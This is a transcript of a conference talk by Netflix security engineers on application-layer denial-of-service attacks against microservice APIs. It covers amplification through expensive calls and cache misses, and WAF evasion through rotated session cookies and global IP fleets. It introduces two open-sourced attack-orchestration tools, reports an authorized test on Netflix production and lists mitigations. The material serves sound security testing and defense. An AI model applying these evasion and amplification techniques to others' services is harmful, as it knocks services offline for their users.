>>We’re gonna go ahead and start with a number. A dollar seventy-one. This is what it cost Jeremy and I to run a five minute test against Netflix dot com in production against one of our evacuated regions or data centers and cause a five minute service outage. We’re gonna kinda go back a little bit in time and start with um this medieval picture here. You can kind of imagine sieging a you know with a battering ram while you’re attacking a castle and there’s archers sitting on top of the castle right and they’re shooting arrows down. And they’re picking people off. You can kinda think of it as your firewall right? And you know we’re doing our denial of service aka we’re trying to brute our way in. And so we’re losing a lot of life right like we’re losing we’re doing work but we’re actually getting hurt. This is an image of Genghis Khan uh sieging a castle. Up here are bodies infected with the Bubonic Plague. He’s catapulting them over the city walls, or the castle walls. That contagion spreads to it’s inhabitants right?. So for a lot less work and a lot less death for his attack basically he’s able to cause sort of an amplification, right? And the inhabitants die. And it’s much more effective. And so that’s really kinda the ethos of the talk today. We’re gonna present why application denial service attacks matter and why they’re extremely relevant in microservice architectures. We’re going to start off with just explaining what application DDoS is. We’ll step into an introduction to microservices. Who here is familiar with microservices architectures? That’s awesome, great. So we’ll quickly go through that. We’ll talk about application DDoS in microservices. I’ll walk you through a framework we’ve developed to help you identify application DDoS in your own environments. We’ll also be um doing a case study where we’ll look at what we did against Netflix dot com and we’ll introduce you to the two tools we are open sourcing today Repulsive Grizzly which is our application DDoS framework. And Cloudy Kraken which is our AWS red teaming orchestration framework. We’ll then do a demo. And we’ll discuss a mitigation strategies and a call to action and some future work ideas we have. So application denial service is just a denial service focus at the application layer logic. And you’ve probably attended talks that focus on the network layer um you know you’ve probably heard terms like amplification attacks etcetera. Uh, we’ve decided to focus on the application layer because we’ve found that in certain circumstances you can cause applications to become very unstable for a lot less requests. When we’re doing research we identified that application DDoS isn’t that novel and we’ve pulled this from the Akamai’s state of the internet security report. If you notice in the upper left hand corner here. It accounts for basically point six percent of all DDoS. So it’s, it’s not very common. And then if we actually look at what kind of application DDoS. If we look at the numbers here. Most of the DDoS that oncomine saw were get requests. So it’s just like somebody hitting a URL. And only ten percent of all application DDoS were post. Basically I’m sending a request to the web server. Potentially a little bit more sophistication. So although it’s not very common, it’s happened. Which means that attackers are privy. They know that this is an exploitation vector and they’re using it in certain circumstances. So quick introduction to microservices. Microservice is basically our-a collection of small loosely coupled but collaborative services. So think of them as like really lightweight services that boot quickly um can solve simple problems um you know are often pretty small blobs of codes sometimes are single purpose sometimes are just a few purposes. But the id-i-idea being that instead of having like a giant monolithe right, a huge JAVA application, uh you know you would potentially have an environment where that what once used to be your giant JAVA application is now fifty sixty different services that are kinda connected together. And it provides some really unique benefits for companies that have really large environments and have large customer demands. So who uses microservices? I work for Netflix. So we do. Who-Anybody here work for a company that uses microservices? Awesome. So here’s some companies that use it and microservice architectures there’s- there’s a couple different approaches. We’re gonna be focusing today on what’s known as the API gateway architecture. So you might work for a company or are familiar with microservice architectures that are more grid based, mesh based. Those’ll be outside the scope of the discussion today. So just a quick primer. I mentioned we’ll be focusing on an API gateway in-infrastructure. And so you can see in the image here. Basically and API gateway is your single entry point. It’s gonna be that system that sits on the edge, or that’s internet accessible. And it’s gonna provide an interface for your middle tier and backend services. So think of it as like basically just a place where you can invoke calls that will then federate through your middle tier and backend services. And those middle tier and backend services they might provide libraries for the API gateway and maybe those libraries let-let the gateways make rest calls. Maybe it’s um GRPC or some other RPC framework. And the specific examples will be discussed when today gets rest based. Another concept I wanted to touch-touch on was circuit breakers. So if we think of the circuit breaker you could of this as that gateway. So then once again a sort of centralized API service and the supplier you could think of as a middle tier service and the client can be like your web browser, right? And so there ends up being like a connection problem betw-at some point in time. And the API gateway starts getting these timeouts and after a certain number of timeouts are triggered it fast fails, right? So it triggers the circuit and it says I’m no longer gonna try to make requests to the middle tier service. I’m just gonna return to generic error. Maybe I’ll return some sort of a fallback experience or some-something so that the person using my site gets some value. But the idea being that um it really gives your middle tier services times-time to recover. A couple things you have to take into consideration are how do you know what timeout to choose and how long should the breaker be triggered? Cache is another important concept that’s often leveraged in microservice architectures and really the focus here is just to speed up response time. So, um the idea being that if we know what a user or particular use case is. Let’s Cache that data upfront, return it very fast. That reduces the load on the services fronted by the Cache and so you ultimately, potentially need less servers in your middle tier and your backend. Okay, Now that we’ve got the introductions out of the way. I wanna talk about some common application DDoS techniques and application DDoS is not newer novel. Um we’ve found references from it eh you know a what fifteen or twenty years ago and a lot of the focus has traditionally been on regular IO things like CPU, Mem, Cache, Disk, Network sequel etcetera. But now that our application environments are-are becoming a little more sophisticated there’s actually more interesting attack vectors that we should be exploring. Things like queuing and batching like how do middle tier and backend services how do they queue and process requests? What are the library timeouts as-as we mentioned before um you know circuit breakers are-are potentially gonna trigger if-if certain timeouts are hit. So can we take advantage of an application that doesn’t tune it’s timeouts correctly? What about health checks? Obviously the services need to let each other know when they’re healthy. What if we could focus our attacks specifically on the health check? So even if the service was fine, but we can cause the health check to fail, we might be able to cause some service instability. And then things like-that don’t auto scale. You can imagine um a giant JAVA d-monolithe or a backend database um and when we say autoscale think of this as a concept of my service has gotten a lot of work and I’m gonna boot more of it. Um and that’s really what we mean by auto scaling so as you can imagine a giant database it migh-ni-might not be able to boot a lot of versions of that very quickly so that might be another area you wanna focus your attack on. And so really ah what I wanna drive home to point is that there’s a difference here between monolithic denials service and microservice denial service. I would say most monolithic application DDoS is one to one meaning like you’re sending in some work to the service and it’s kinda happening on that box right. And so it’s-you know it’s calc-doing some calculation and so it’s kinda like a one to one work-work per request raito and now that’s-I say it’s most because there are monolithic applications where you might actually be able to get a little bit of amplification going. But in general it’s gonna be like on a single system. In microservice application DDoS it’s often one to many cause if you can imagine we might make a request at that gateway that gonna federate out to tons of middle tier and backend services and if we construct those corre-requests correctly we might be able to cause a lot of work and each one of those services in the middle tier and the backend they have different characteristics they have different health checks they have different timeouts they have different um you know potentially system builds and configurations. There’s a lot of things that we might be able to cause havoc on if-if the system can’t handle those requests that we are sending through. So here’s like a new school microservice API DDoS example. And like here’s little Jimmy Wright our ‘90’s kid. Here’s Jeremy he’s typin with uh gloves on right that’s how we all hack right. So the idea being here we have an edge you can think of the edge as basically these are things you’d be able to hit in your browser so we have our proxys our website maybe this is like static assets and what not another proxy. We have our API gateway here. API gateway once again provides an interface to middle tier and backend services right. So we fire up our script it’s a Python script let’s assume it’s I don’t know two hundred threads or something we’re posting to recommendations and then there’s a JSON blob that’s says range uh I can’t see it says range zero to ten thousand. Okay. So that call flows in and the API gateway starts making many client requests. So let’s just assume it starts pegging those middle tier services for those ten thousand recommendations. The middle tier services started making many calls to the backend services maybe to retrieve data. The backend service queues start filling up with expensive requests. And now we’ve reached that sort of sweet spot right. The client timeouts start happening circuit breakers might trigger and maybe some of the data comes back, maybe not all of it. Maybe a fallback experience is triggered and once again a fallback experience you can kinda think of is like hey I don’t know what to do so I’m gonna give you some data to work with. That way you know your customers can still sort of browse the site. Cool. So let’s-let’s d-get a little bit more into that. Another example same sort of attack. We have a single request asking for a thousand objects not in Cache. Now I mentioned that objects not being Cache is extremely important because Cache is fast it’s hella fast. So if-if we’re trying to exploit an application DDoS um vulnerability and we’re only targeting things that are in Cache we’re not gonna be successful. So we have to perform a Cache Miss attack. And now if you-if you Google Cache Miss you’re gonna find stuff for like intel processors. This is much higher in the stack. And really all we’re doing here is to figure out what’s in the Cache. Obviously if you’re testing this in your own environment or for your own company you might have a good idea what’s in the Cache. Um so figure out what’s in the Cache and then just makes calls that require lookups outside the Cache. And often if you specify really large requests, ranges and object sizes you can actually perform this. So we’ll stop back for the example again. We have that single request asking for a thousand objects not in the Cache. The middle tier library that we have whatever doesn’t support batching so the gateway basically has to make a RPC call to every-for every object we’re asking. So since we’re asking for a thousand objects and two middle tier services have to be returned for this specific request the result in two thousand RPC calls. Those middle tier services need to call the backend services and they have to call three backend services or six thousand calls. So you started seeing-seeing the-the trend here right. Like there’s-there’s an opportunity for a lot more requests to happen once we get to the API gateway. So what is the workflow for identifying the application DDoS? This first thing you need to do is identify the most latent service calls. What are the calls that are going to be the most expensive? Touched most middle tier and backend services. And once you identify those you want to investigate gateways to manipulate them. How do we make them more expensive? How do we get those calls to touch more services? Once we’ve determined those circumstances we want to learn more about the API gateways error conditions like how do we know our attack is working? Um how do we know when we are being um blocked by firewall? What are like the thresholds and timeouts um of the particular clients that we’re targeting? And once you build that story up you need to actually tune your payload to fly under the WAF. And we’ll ta-discuss a couple techniques you can use to do that. We’ll test our hypothesis at a small scale and then we’ll scale up our test using the Orchestration framework and our Repulsive Grizzly attack framework which we are open sourcing today. [single person clapping] Thank you. Heh, hehe cool. [Laughing] So um I gotta find latent service calls. Now I-I will admit this is-this is error prone. But this is a-a good first step if you’re just kinda getting started with this process. Open up Developer Console in Chrome click the Preserve Log button and just start browsing the site. After some period of time, sort by time. And then look at those requests like those post requests your API gateway. I’ll mention why this is a little error prone as you can imagine like just because a call doesn’t show up as like latent. Doesn’t mean it couldn’t be made latent right. So this you might miss some opportunities here. Actually I think a better approach would be to potentially automate this out. You could imagine a spidering tool that would sort of crawl to your applications doing a fair bit of sampling to figure out what calls are the most latent. So I think there’s some room for us to improve on ways to actually identify those calls automatically. Oops sorry. It froze. Sorry about that. Can you hold this for a second. I’m like literally, the laptop froze. Sorry about that guys. Gimme just a second here. We have a back up. Yeah, I’m-I’m fully bricked. We good? >>Shoulda got real jobs! [nervous laughter] >>Cool. We’re good we got a back up. Yeah. Cool. Thanks guys. Hunter two. [Laughter] Cool. Alright. So let’s assume that we’ve identified an interesting latent service call. Um the first thing I might do is I found this-this call I-I’m not sure if it’s interesting or not yet. Um it might be a little bit harder to see in the back so I’ll kinda walk through it. Here we have a post request to some licensing end point. It has a bunch of encrypted data and what I di-you know bay sixty four decoded it and started messing with it- it just returned to fast error code. So like there wasn’t really anything for me to tweak even though the call was latent changing the IO didn’t really result in an increased latency. So this is kind of an example of a call that, nah, might not be a good attack vector. So here’s another inter-another call that might be a little bit more interesting. Once again this post to that recommendations endpoint we’ve kinda been using as our example here. And you’ll notice in the JSON body here that there’s an array of items. I observe that when I add more items to that list, it resulted in a longer response time. If I added too many items to th-that list I got a special error code. Okay. That’s kinda cool. So changing that IO resulted in an increased latency of the API calls. So a more accurate way to find latent service calls is to actually have visibility into what your middle tier and backends services are doing. And this is a dashboard that we have in Netflix that helps us actually identify that. I’m zooming in on three areas that I think are interesting. The first is request per second. So how many times is this particular service being invoked? The next is Cache response. Does this service actually Cache content? And then the most interesting bit to hear is actually just latency. And here it’s actually doing a rollup of latency based on ninety percent of requests um and we see we have one call here that averages two seconds. So that’s interesting. So a technique that I might use here is I know that these services can be invoked via the API gateway. Now maybe I didn’t find em with that original discovery method that I discussed. But I could probably step my way back through. Go back to the documentation on the API gateway and figure out how to invoke those latent service calls. So if you’re in a position where you can actually see this. You’re gonna have a much higher chance of finding those latent calls. So once we’ve identified those latent calls let’s discuss some attack patterns we can leverage to make those calls more expensive. The first is range. We’ll also discuss object out per object in. M-manipulating request size and then just a combination and there’s other vectors here but these are the three that we’ve found to be the most effective. So the first technique is range and you’ll see here that we have a request for items once again recommendations and we have a from and a to here. So if we go from one to two what if we change it from one to two hundred to twenty thousand to two million and you’re probably thinking to yourself huh this feels a lot like s-like what a scraper might do. Oop. Did it just start doing that? Oh there we go. Cool. It’s glitching a little bit. That’s-that’s too bad. Sorry about that hopefully it doesn’t give you a headache back there guys. Um so what we basically observed was you know we can increase the range and this technique is really similar to like what content scrapers use. That is obnoxious man. [Laughing] We’ll keep going. And we’ll skip over that note. Cool. Alright we’re gonna go to the next one. Object out per object in so here we’ve identified like a direct object reference right so we have an ID here so what if we send more of those in? Yeah can you just see if you can get that working? Thanks. Just reboot it. Cool. Okay so the idea being here that if we enumerate out more objects. If we send more objects in maybe we’ll see an increase in response size. Or s-sorry an increase response time. Yeah dude, thank you. Cool. Request size is another technique we could take advantage of so as you can see in the corner here we have like this-this element called art size and it has a range of three forty two by one ninety two um so if we imagine pinning like a zero onto the end of there. If that art size is calculated in real time you could imagine that that might result in increased latency. So once again that’s another place we can potentially toggle the switch here and you probably notice that a lot of the steals similar to what a content scraper might do. But you know you’re trying to pull a catalog off of some site. You’re kinda like manipulating the range of your requests. That’s really ultimately what a lot of these techniques are. That’s like the same stuff that a content scraper uses. Or you can use a combination right. So we can kinda coggle everything let’s just turn all the knobs that we possibly can. What about like languages right. You guys probably noticed like English and Spanish. What if we put like French, Cantonese? Um or what if we touched these object fields that it’s obviously looking for description title artwork. Maybe if we put more object fields in there we would touch more microservices. Next thing you wanna do is build a list of indicators on API health. And so as I mentioned before the API gateway um, you know you kinda wanna know if you’re-you’re attack is being successful. So the first thing is like what’s a healthy response probably like HTTP two hundred right. When does your API gateway timeout? What this basically means is like. You API gateway is under so much distress that like it literally cannot function anymore. Specifically in our test example we got a five o two bad gateway. Your environment you might get a five hundred. Maybe you get a stack trace. Maybe you get something on the server. Um but there might be an indicator that your API gateway is not healthy. The next is, what about those middle tier services. What if they’re not healthy. Um we might see something like a five o three service unavailable or that might let us know that one of the circuit breakers has actually been triggered. What about a WAF what if we’ve you know we sent too much work sent too many requests. We’re getting blocked. We might get a four o three forbidden. Or the rate limiter so if you’re in an environment that actually has a rate limiter, know that that’s not very common, but um you know you might you might see something like a four twenty nine. And then framework exceptions. These are kinda interesting and sorta unique and novel like you might end up in a position like the application wanted to do some work but it just literally gave up and said you’re asking me for too much work. And then there’s other indicators. So if we zoom in here. We got an HTTP two hundred okay so but look at the latency here right. That’s like sixteen seconds. And that’s a huge response. So you know HTTP two hundred plus latency that’s kinda like the Holy Grail. That means like you are causing a lot of work um on the backend. Another thing you might see is like an empty response. You might send something. Might take sixteen seconds to return and then you get nothing back. So there’s you’ll start gettin kinda these weird errors conditions when you send enough traffic up the services. And obviously look for correlations. Like while you’re running your tests. Um you know be browsing your site like are there other systems that impacted that you didn’t even th-take into consideration. So once we’ve kinda built up that latent request. We need to find the sweet spot. And really that’s gonna be finding the right balance of number of requests and per the logical work per request cause as we mentioned before we have a lot of knobs we can- we can tweak to make more work happen per request. So you know there’s gonna be some spot where the service is healthy right. And there’ll be a spot where there’s a service impacted. When there’s enough requests and enough logical work per requests. Now if we send too many requests too fast or too much um work per request too fast we’re gonna get rate limited. And once again you could think of rate limiting as like the firewall might kick in might block us. Now if we don’t send a lot of requests but the logical work per request is high the service might scale up right. It might boot more of itself and it might stay healthy. So really our job is to find the skull and crossbones right like we wanna be in a sweet spot. Just under where we’re gonna get blocked by the firewall. And just enough where we’re gonna cause the service to be disrupted. So a quick case study here, it all started with this HTTP status four thirteen. Has anybody ever seen this status code before? It’s kinda new for me. Um the description is the request entity is larger than the server’s is willing or able to process. Like DING, that sounds really cool right? It literally gave up. So what we tried to do is figure out how to get rid of the four thirteen. We actually wanted to get like, a better status code. But we actually wanted the server to do the work and not quit right out of the gate. So I had to make the call more expensive. So once again I was kinda tweaking those knobs we discussed in the framework section of the talk. And I got to a spot where I was able to get to a relatively large response size and it was pretty darn latent. Now the next thing that we wanted to do was test it on a smaller scale. And to do that we used Repulsive Grizzly. So Repulsive Grizzly is a Skunkworks application DDoS framework that we are open sourcing today. I mentioned it’s Skunkworks because uh you know it’s kinda as is. It’s definitely not a documented or feature rich as some of the other projects I’ve open sourced, but the idea being that I was hoping that the you know community kinda build on it and also I’m sure you’ve probably might have used other denial service tools in the past. The reason we wrote Repulsive Grizzly is we wanted to have a couple of special functions that would help us exploit application DDoS and microservices and we’ll actually walk through a couple of those. It uses Eventlet for high concurrency so it’s super fast. And it also leverages AWS SNS for logging. So SNS you can think of is kinda like a messaging service and so when we run these attacks and we actually scale them up, we have a place we can write log messages and sort of the health of our attack agents while we’re running a test. It’s pretty easy to configure too. See here’s a mountain of cookies, aka, sessions. Delicious right um what we’re trying to do here is bypass the WAF and so one of the techniques that Repulsive Grizzly leverages is it has the ability to Round Robin authentication objects so you might sign up to the site or maybe you know you’ve generated a bunch of session cookies for a particular application. You can use Repulsive Grizzly to sorta iterate through those and Round Robin them so you can sort of fly under the WAF if needed. So here’s a single note test and it might a little bit hard to read in the back so I’ll kinda walk you through what’s goin on here. So we fired up this specific attack and we’re looking at the status codes over here. So we’ve got some two hundreds and two hundre- oops five o fours and a ton of five o threes and as it goes on more- more five o threes more five o fours and I start getting pretty excited cause I realize at this point in time like I’ve caused quite a bit of unhealthiness and although there were some two hundreds that were comin through it wasn’t very common so as I’m sitting there running the test and we have a few browsers open. I’m refreshing the page and in general I’m just getting site errors. Every once in a while a site would come back but in general it wasn’t working very well. So the next step we decided was to develop Cloudy Kraken which is an orchestration framework um and Jer-Jeremy’s the author of that and he’ll kinda walk you through how he approached it. >>So um, Scott came up with uh an awesome new attack for um you know against the application, but in something like uh Netflix, it’s a global service. There are lots and lots of WAFs there’s denial service prevention mechanisms so while he can run those from one laptop, that’s really not gonna cut it if we wanna try and attack the whole infrastructure. So what do we do? We automate it. So now we’re gonna have a whole bunch of Cloudy Krakens running um and and a lot of Repulsive Grizzlys. So what is it? It’s a RED team orchestration framework it’s written uh in Python, runs on AWS. And some of the key features are um definitely you can get a fresh instance of global fleet every time you want to run the test and this really helps for getting fresh IP address. Uh fresh parts of the world, fresh cider blocks uh to really try and get around what you might normally see with a WAF or DDoS production. So you get lots of good global IP’s because a common thing you can do uh for DDoS is to do a velocity base checking so you’re watch and see how many one IP address hits and uh you can block based on that. And um another key point is um as you’re doing all things attacks you’re trying to uh try it out more um different kind of um attacks and configs is-it has all the uh code push and configuration automation built in. So if-when you have a new attack you wanna try out, you just go ahead and run the script again. It will rebuild global fleet and restart your attack. Uh since it is a global attack you wanna make sure that the timing is right so you can be effective and so it can be reproduced because I get is over time, you know it’s a great attack tool but what you really wanna do is have it be a regression test. So that you can say every time I’m gonna run it for exactly five minutes at this time of day when I just did this new push of code to the backend and you can get-check and see how your infrastructure can handle it. So um getting all these instances around the world to start at exactly the same time and stop exactly at the same time is a key component. Alright and then lastly we are attacking, in some cases, production environments. So if we maybe make a mistake and attack the wrong one it’s good to have an immediate kill switch to shut it all back down. So how many people have worked with AWS? That’s a lot of people. So um generally with this uh is kinda the overview of how it works um. In AWS they have different regions around the world which are basically data centers around the world. So we can push out the instances to different regions. We have a single S three bucket a single Dynamo DB uh table that holds a configuration and the code that’s actually gonna uh run against the servers in the test. And then like we said before we have the SNS is a Pub/Sub message system so you can send back all the status and it’s-uh er status backboard-um dashboard in the backend. So this is kinda the general workflow of how Cloudy Kraken works. Um you put your uh attack code in a GitHub and then it’ll update the code, push it out to S three, it’ll push it out to Dynamo, it will reset everything and get ready to go. Next it’ll actually build all of the environment, so again you get a fresh set of instances uh and and we definitely like to use instances and not docker and the big reason why is cause we can use that enhancement workdrive that you get on ADMC2 instances when they’re big. Uh so it’ll create all the networking um the the subnets and everything, get all uh IP addresses set up and then it’ll launch instances. And then using Cloud in it it, it will config the machines. It will uh get all the machine to download the code, configure themselves and then wait to start the attack when the time hits. So as the attack is actually running uh it starts running all the data through SNS and a big part is at the end when we’re uh done with testing we wanna make sure we get back all the log data from the systems so we can actually go back and analyze what the exact results were and uh output that we got. So now that we have the system built, uh we went ahead and ran the test. So we did test it against the production environment of uh a service and we did it using a multiregion and multiagent setup so in this case we were running in four different regions and we’re running ten instances per region so for about forty instance overall, globally. And each one had about uh um I think it was two hundred and fifty threads each uh running. So we conducted two different five minute attacks. And then we had a chance to monitor its success and actually uh see how well it worked. So uh from the simple view of our status dashboard you’ll see that we have at the bottom we have all the notes showing saying hey I’m online. Uh and then you’ll see all the requests going through and what kinda status codes we get. So we-you can immediately see at the top which is kinda hard to see but those are all five o threes and five o fours. So uh a majority of the calls coming back as the test are running are all types of failures. So here’s the results of the test. We had eighty percent failure rate. Um and on any sort of large UI or a large uh service like Netflix or Hulu or anything else, you’re gonna have um problems if-if you know fifty percent of your calls are failing most of your UI will fail Or you might have parts of your UI which will rely on other parts so, once you get past a certain percentage you’re gonna have no user experience and you’re effectively offline. So during the attack you can see the first one ran great and we got really good results with that one. Uh the second test again we wrote some new code, pushed it out really quick, tried it again. Wasn’t as effective um but this is kinda why we like to have that uh immediate ability to push out new code and retest and and have a high velocity of deployments just like we do with other services and microservices do the AV testing and pushing out new stuff. We’re trying to replicate that. And the more dev setups type environment. Uh overall while this was running we had less than one percent of the traffic being blocked. So we effectively between all the cookies, between all the different parts of the world and all the IP addresses we were using we were able to get our attack to go through. And again overall at the time that we ran the test it would’ve cost about a dollar and seventy one cents to run the whole test to take out the those production service we were attacking. Uh these days, it could probably be a little bit cheaper with spot instances. Uh and overall, depending on the service you’re using with AWS, you can actually fit it all into the free tier. So you can probably actually do it for free. [laughing] [clapping] Thank you >>So what failed? Um We had a couple things that I thought were pretty interesting worth discussing. Um we-we identified expensive API calls that we could invoke with non-member cookies and I’ll explain what that is. Has anybody sure you’ve browsed a site you get like a J Session ID before you log in or like a PHP session ID or some sort of session identifier. We actually observed that we could take those and issue them against er against the API in certain circumstances and cau-and actually cause latent calls. So one of the first things I did was I was like I just wrote a slot name script and we dumped like five thousand cookies right and we kinda used those in a Round Robin fashion. That was-it was kind of an interesting finding. Um the expensive traffic resulted in many RPC’s. It averaged to be about one call to the API gateway was seventy two hundred RPC calls between middle tier and backend services. And the WAF wasn’t able to monitor those middle tiers RPC’s it just wasn’t configured to look at em. It was you know looking at the gateway but it wasn’t actually looking at those middle tier and backend calls. So let’s dive in a little bit on how this exactly worked and then we’ll show a demonstration. So the first thing is we have our attack agents cycling through multiple session cookies and IP addresses right to bypass the WAF. Each request that we make is asking for seventy two hundred expensive calculations from multiple backends. The objects weren’t in the Cache so we were getting Cache Miss’. So each time we had the Cache Miss they had to look-make a call to the service to look that information up. It took about fifteen seconds which returned this huge object score. And the queue kept taking longer and longer. We started noticing that fifteen seconds started to be like eighteen seconds, nineteen seconds and as that queue continued to fill up, uh the service got more and more unhealthy. The middle tier services, I mean sometimes they were returning two hundreds I mean they actually did return. Um but often they were turning some five by six status code five o three, five o four, sometimes just five hundreds. Sometimes it would return a two hundred but it would totally be an exception. Um so that was kinda interesting. And the API gateway had to start responding so it starts triggering breakers. It’s the-you know the WAF’s kicking in sometimes we’re getting four o threes sometimes we’re getting five o three, two hundreds, five o fours. But ultimately all these RPC calls were really really slamming the gateway so it knew it needed to start scaling up. But it couldn’t really boot itself fast enough during the attack and ultimately the CPU just started to smash on the API gateway and we started getting these gateway timeouts. So at the-we reached a point where the gateway itself could no longer facilitate requests. And demo, alt tab. Okay so at this point in time we’ve already provisioned our attack environment and we’re gonna run um a Kraken attack here. So the first thing we’re gonna do is configure the attack uh the number of threads, the instances, what region or data center we want to run it from. Or regions, plural. And so for this specific example we’ll run it from US west two. We’re gonna run attack one. We’ll run twenty threads per attack agent. We’ll do seven agents and we’ll run the test for two hundred and forty seconds. Cool. Alright so here’s our staging environment. This is where we kinda did our testing and you’ll see that the site’s online. We’ll go ahead and go back and pop on the Amazon council here to look and see how our agents are doing. We’ll go ahead and hit the refresh button and notice that the agents are in pending states, so they are starting to boot up. And then right here you see the Grizzly tracker I mentioned before. Grizzly tracker is kind of what’s listening to that central queue and kinda giving us what’s going on with the status codes and the health of everything. Alright so once those agents come online and they’re running, we’ll go ahead a grab an IP address we’ll SSH on. And I’ll show you just what’s kind of going on on those agents. So it’s just booting up at this time. It’s installing all the packages it needs. It’s pulling down that Repulsive Grizzly attack framework, installing all of it’s dependencies. And it’s waiting to start the test. Alright so it-the agents are phoning home and they’re starting the attack. We see the green coming in. And now the status codes start flowing and I’ll pause it here. We’ll see some five o threes, twenty six hundreds. So we know we’ve cause quite a bit of havoc. Um we’ll continue to let it go, more five o threes are coming in. We’ll pop back up to the site, we’ll refresh. Is it healthy? Yes okay alright lets keep going keep going boom. We got a five o four origin re timeout that’s pretty good right. So how do you defend against this and mitigate it. I-I think the first and most important step is really to understand what microservices impact your customers experience right like you need to know if you have specific services that if they become unstable, kind of result in a cascading system failure. And once you have a good understanding of what those are you need to put the proper CPU protections in place. A good example, to-a-a good reasonable uh mitigation is actually just to limit the batch and the object size, right, like if I can’t make a request to your service that’s absolutely ob-obnoxious and abnormal. You know if you’re a service that usually returns ten objects and somebody’s asking you for one million, you know you should probably have limits in place. Hard limits. And you should enforce those limits on both the client and the server. The rate limiter whenever possible or your web application firewall, it should monitor the middle tier signals. Or the cost of the request right. If we’re only monitoring at the edge or at that gateway, we’re missing the point. If I’m sending one request on that actually is resulting in seventy two hundred requests. We need to know that, and so we should have the visibility and the insight into those middle tier services, so that we can enforce the right sort of blocks and protections way before we end up in a cascading systems failure sort of world. The rate limiter should also monitor the volume of Cache Miss’ and once again if your service has data in Cache. And most of the time you know those objects come from the Cache. It-it either- if you start seeing all these Cache Miss’ that means one of two things, your Cache is misconfigured, or somebody’s doing something nefarious right. You’ll want to prioritize authenticated traffic over unauthenticated and-and as I kind of mentioned before we had these basically unauthenticated sessions and we we’re able to use that to take down the service. Performing an authenticated denial service attack is a lot more expensive right. You actually have to get sessions and although there’s ways to do that in general. Most likely it’s going to be and authenticated attack. You’ll want to configure reasonable library timeouts. Right, if you set your timeouts too aggressive um we might be able to trigger the circuit without a lot of work. If you trigger them-if you set the timeouts too lenient, you might be able to cause the services to become unhealthy before you’ve triggered a circuit breaker, so you have to be conscientious on what your library should be set to. Library timeouts, excuse me. And then finally triggering a fallback experience. And so you can kind of think about fallback experience once again as like your service is super unhealthy maybe you just want to at least return like some sort of generic some sort of experience to your customers so that way they don’t just get some XML five o four error when they-when they perform the denial ser-or when the service is really unhealthy. So there’s some future work in some areas I think we could explore a little bit more. Um automated identification of potential vulnerable endpoints. I eluded to this a little bit earlier but um it’s kind if a manual process for me at this point but I imagine that with enough sampling, enough request sizing and enough sort of munging of the data, maybe we could find a way to identify those latent calls automatically. And then also auto tuning during and attack. As you imagine, as you’re conducting a large scale application DDoS attack, things are going to change while the attack is going on the-the WAF’s going to kick in. Services are going to go up and go down. Really we should be able to set up success and error criteria in a tool and let the-let the scanner sort of automatically tune how much work or how much requests it’s sending when it’s running the attack. And then finally I think there’s really interesting opportunity for testing common open source microservice frameworks libraries and gateways. I-I would imagine that there’s probably more to be explored in this space. And with that I’ll say thanks. We are gonna be hangin out in the chillroom after the session which is where registration was, and here are links to pull the source code. Thanks. [clapping]